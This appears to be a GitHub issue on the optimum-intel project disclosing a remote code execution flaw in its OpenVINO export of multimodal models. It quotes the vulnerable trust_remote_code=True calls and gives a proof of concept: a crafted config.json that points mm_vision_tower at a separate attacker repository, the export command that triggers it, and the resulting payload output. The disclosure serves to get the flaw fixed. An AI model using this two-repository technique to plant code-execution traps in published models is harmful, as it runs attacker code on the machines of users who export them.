Skip to content

Remote Code Execution via LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig #1668

@Vancir

Description

@Vancir

Description

There is a remote code execution vulnerability in optimum-intel during OpenVINO export of multimodal models. The issue is in LlavaQwen2OpenVINOConfig and Phi3VisionOpenVINOConfig, which unconditionally call AutoConfig.from_pretrained(..., trust_remote_code=True) on the repository specified by config.mm_vision_tower and config.img_processor["model_name"].

At first glance this may look acceptable because the real llava-qwen2/phi3_v architecture normally requires custom remote code. However, this assumption is unsafe. Take LlavaQwen2OpenVINOConfig as an example, an attacker can publish a seemingly normal model repository, set export_model_type to llava-qwen2, and control the mm_vision_tower field in config.json so that it points to an attacker-controlled backend repository. When a user runs the normal OpenVINO export command, optimum-intel initializes LlavaQwen2OpenVINOConfig, fetches the attacker-controlled backend config with trust_remote_code=True, and executes remote code.

This creates a stealthy two-repository attack. The frontend repository can look benign and contain only a crafted config.json, while the actual malicious code is stored in a separate backend repository. As a result, the attack can mislead users and bypass existing security checks that focus only on the frontend repo.

This issue can be triggered through the standard optimum-cli export openvino workflow. That makes the attack practical for normal users who are simply trying to convert a model, without realizing that the export step itself can execute attacker-controlled code.

Root Cause

The vulnerable code is:

self._behavior = behavior
self._orig_config = config
if self._behavior == VLMConfigBehavior.VISION_EMBEDDINGS:
config = AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)
if hasattr(config, "vision_config"):
config = config.vision_config

and

if self._behavior == Phi3VisionConfigBehavior.VISION_EMBEDDINGS and hasattr(config, "img_processor"):
self._config = AutoConfig.from_pretrained(
config.img_processor["model_name"], trust_remote_code=True
).vision_config
self._normalized_config = self.NORMALIZED_CONFIG_CLASS(self._config)

The export path also allows attacker-controlled models to reach this class:

if hasattr(model.config, "export_model_type"):
    model_type = model.config.export_model_type
else:
    model_type = model.config.model_type

submodel_paths = export_from_model(
    model=model,
    output=output,
    task=task,
    ov_config=ov_config,
    stateful=stateful,
    model_kwargs=model_kwargs,
    custom_export_configs=custom_export_configs,
    fn_get_submodels=fn_get_submodels,
    preprocessors=preprocessors,
    device=device,
    trust_remote_code=trust_remote_code,
    patch_16bit_model=patch_16bit,
    **kwargs_shapes,
)

Proof of Concept

I created two Hugging Face repositories for demonstration.

The frontend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign, contains a crafted config.json:

{
  "model_type": "llava",
  "export_model_type": "llava-qwen2",
  "mm_vision_tower": "XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil"
}

The backend repository, XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, contains attacker-controlled code that will be loaded through AutoConfig.from_pretrained(..., trust_remote_code=True).

Then run the normal export command:

optimum-cli export openvino \
  --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign \
  --task image-text-to-text \
  ./tmpdir

During export, optimum-intel reads the frontend model config, sees export_model_type: "llava-qwen2", and initializes LlavaQwen2OpenVINOConfig. Inside that class, it executes:

AutoConfig.from_pretrained(config.mm_vision_tower, trust_remote_code=True)

Since mm_vision_tower points to the attacker-controlled backend repository, i.e., XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-evil, remote code from that repository is fetched and executed. This leads to arbitrary code execution on the victim host during the normal export workflow.

$ optimum-cli export openvino --model XManFromXlab/optimum-intel-LlavaQwen2OpenVINOConfig-benign  --task image-text-to-text  ./tmpdir 
Execute Malicious Payload!!!                                                                                       
Execute Malicious Payload!!!                                                                                       
Execute Malicious Payload!!! 

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions